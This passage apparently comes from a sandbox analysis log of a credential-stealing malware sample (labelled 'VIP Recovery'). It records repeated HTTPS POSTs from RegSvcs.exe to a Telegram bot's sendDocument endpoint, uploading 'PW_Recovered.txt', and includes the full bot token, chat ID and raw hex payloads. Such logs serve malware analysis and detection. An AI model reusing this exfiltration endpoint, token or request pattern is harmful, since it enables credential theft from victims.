                                                                          2024-09-19 10:24:55 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12845,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          113192.168.2.561702149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:56 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd08864f6f4d2d
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:56 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 38 38 36 34 66 36 66 34 64 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd08864f6f4d2dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:57 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:56 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:57 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12846,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          114192.168.2.561704149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:59 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd02f8244d88eb
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:59 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 66 38 32 34 34 64 38 38 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd02f8244d88ebContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:59 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:59 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:59 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12847,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          115192.168.2.561706149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:25:01 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd091525bd2ff7
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:25:01 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 31 35 32 35 62 64 32 66 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd091525bd2ff7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:25:01 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:25:01 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:25:01 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12848,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          116192.168.2.561708149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:25:03 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd0b324555a5aa
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:25:03 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 33 32 34 35 35 35 61 35 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd0b324555a5aaContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:25:03 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:25:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:25:03 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12849,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          117192.168.2.561709149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:25:03 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd06cf902e9b27
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:25:03 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 63 66 39 30 32 65 39 62 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd06cf902e9b27Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:25:04 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:25:04 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:25:04 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12850,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          118192.168.2.561713149.154.167.220443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:25:10 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd873cf4d1d1f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:25:10 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 37 33 63 66 34 64 31 64 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcd873cf4d1d1fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:25:10 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:25:10 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:25:10 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12852,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          119192.168.2.561712149.154.167.220443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:25:10 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd873cf4d1d1f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:25:10 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 37 33 63 66 34 64 31 64 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcd873cf4d1d1fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:25:11 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:25:10 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
